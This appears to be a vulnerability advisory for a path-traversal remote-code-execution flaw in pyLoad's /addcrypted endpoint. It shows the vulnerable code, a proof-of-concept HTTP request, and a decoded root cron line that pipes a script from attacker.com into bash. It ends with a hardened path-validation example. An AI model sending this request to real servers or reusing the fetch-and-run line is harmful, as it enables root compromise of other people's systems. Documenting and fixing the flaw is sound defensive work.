### Key Information

#### Vulnerability Overview

- **Vulnerability Type**: Path Traversal and Remote Code Execution (RCE)
- **Affected Version**: 0.5.0b3.dev89
- **Fixed Version**: 0.5.0b3.dev90
- **CVE ID**: CVE-2025-54802
- **Severity**: Critical (CVSS v3: 9.8/10)

#### Vulnerability Details

- **Endpoint**: `POST /addcrypted`
- **Affected File**: `src/pyload/webui/app/blueprints/cnl_blueprint.py`
- **Vulnerable Code**:

```python
dlc_path = os.path.join(
    dlc_path, package.replace("/", "").replace("\\", "").replace(":", "") + ".dlc"
)
dlc = flask.request.form["crypted"].replace(" ", "+")
with open(dlc_path, mode="wb") as fp:
```

#### PoC (Proof of Concept)

- **HTTP Request**:

```http
POST /addcrypted HTTP/1.1
Host: localhost:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 167

package=../../../../etc/cron.d/pyload&crypted=EkioqICopKIAgK1Byb29kIi0tLXJvbW1pLFxuZG90IEZ9dGQ8LzF9dGQ8LzJ9YlMub3B5ZWluakA1HwgV
```

- **Decoded Payload**:

```bash
* * * * * root curl -s http://attacker.com/r.sh | bash
```

#### Impact

- **Unauthenticated attackers** can exploit the path traversal vulnerability to write arbitrary files, leading to remote code execution with root privileges.
- **Potential Risk**: By injecting malicious cron jobs or system files, a simple file upload endpoint can become a vector for full system compromise.

#### References

- [7e6a44fe](#)
- [pyload-fix](#)
- [pyload-pull](#)
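A defensive counterpart to the file-path construction shown under Vulnerable Code, as an added example that is not pyLoad's code or its actual fix: it rejects unexpected package names outright and verifies that the resolved path stays inside the download directory before writing. The names `safe_dlc_path`, `write_dlc`, `UnsafePackageName` and the allowlist pattern are assumptions of this example.

```python
import os
import re
import tempfile

# Allowlist for package names (an assumption of this example, not pyLoad's rule).
_SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9 ._-]{0,99}")


class UnsafePackageName(ValueError):
    """Raised when a package name cannot be mapped to a file inside the base directory."""


def safe_dlc_path(base_dir: str, package: str) -> str:
    """Return the absolute path of <package>.dlc, guaranteed to be inside base_dir."""
    # 1. Reject instead of rewriting: stripping characters can leave surprising names.
    if not _SAFE_NAME.fullmatch(package) or ".." in package:
        raise UnsafePackageName(repr(package))
    # 2. Resolve symlinks and relative parts on both sides before comparing.
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, package + ".dlc"))
    # 3. Containment check: the resolved file must sit directly in the base directory.
    if os.path.dirname(candidate) != base:
        raise UnsafePackageName(repr(package))
    return candidate


def write_dlc(base_dir: str, package: str, data: bytes) -> str:
    """Write data to the validated path without overwriting or following symlinks."""
    path = safe_dlc_path(base_dir, package)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as fp:
        fp.write(data)
    return path


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(write_dlc(tmp, "my package", b"constructed sample bytes"))
        # Constructed inputs, including the package value from the PoC request above.
        for bad in ("../../../../etc/cron.d/pyload", "..\\..\\x", "C:evil", ""):
            try:
                safe_dlc_path(tmp, bad)
            except UnsafePackageName as exc:
                print("rejected", exc)
```

Running the service as an unprivileged user that cannot write to directories such as `/etc/cron.d` limits the impact of any remaining file-write flaw.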